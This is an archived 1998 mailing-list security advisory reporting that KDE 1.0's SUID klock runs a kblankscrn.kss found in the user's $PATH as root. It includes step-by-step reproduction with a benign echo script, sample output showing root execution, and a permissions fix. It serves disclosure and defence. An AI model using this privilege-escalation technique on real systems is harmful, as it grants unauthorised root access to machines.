KDE 1.0's klock can be used to gain root privileges

From: HD Moore (hdmooreat_private)
Date: Mon Nov 16 1998 - 17:57:51 PST


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    --( the problem )--
    
    The SUID program klock shipped with KDE 1.0 attempts to execute
    kblankscrn.kss in the same directory as it.  If kblankscrn.kss cannot
    be executed (missing or mode -x) then klock will search the current
    user's $PATH for any executable with the same name and execute it as
    ROOT.  If no executable is found in the current path it gives this
    message:
    
        >Could not invoke kblankscrn.kss in $PATH or /opt/kde/bin
    
    Default modes for klock and kblankscrn.kss are:
    
    -rwsr-xr-x   1 root     root         8760 Mar 12  1998 /opt/kde/bin/klock
    -rwsr-xr-x   1 root     root        43600 Mar 12  1998 /opt/kde/bin/kblankscrn.kss
    
    Systems Affected:   any system that runs KDE 1.0
    ____________________________________________________
    
    
    ( the exploit )
    
    This is only exploitable if any of the following occurs:
    
        1) klock is moved to another directory
        2) kblankscrn.kss is moved to another directory
        3) kblankscrn.kss is not executable
    
    To see if you are vulnerable...
    
    1) as root, chmod 600 /opt/kde/bin/kblankscrn.kss
    2) login as a normal user
    3) create a shell script that looks like:
    
            #!/bin/sh
            echo Running script as `whoami`!
            exit
    
    4) name this script kblankscrn.kss and mv it to your home directory.
    5) execute /opt/kde/bin/klock, you should see:
    
        user@hostname:/home/user> /opt/kde/bin/klock
        user@hostname:/home/user> Running script as root!
    
    6) as root, chmod 755 /opt/kde/bin/kblankscrn.kss
    ____________________________________________________
    
    
    --( the fix )--
    
    chmod 700 /opt/kde/bin/klock or wait until KDE is updated.
    The KDE buglist has been notified.
    
    
    
    
    -----BEGIN PGP SIGNATURE-----
    Version: PGP for Personal Privacy 5.0
    Charset: noconv
    
    iQA/AwUBNlDXoa51X44hunVSEQJl2wCgzFbX8KdOfCfOMZGREF5e9H2BGA8An3Qw
    UmLBRO0nACQcXreodKkWFrpm
    =rKnX
    -----END PGP SIGNATURE-----
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:23:35 PDT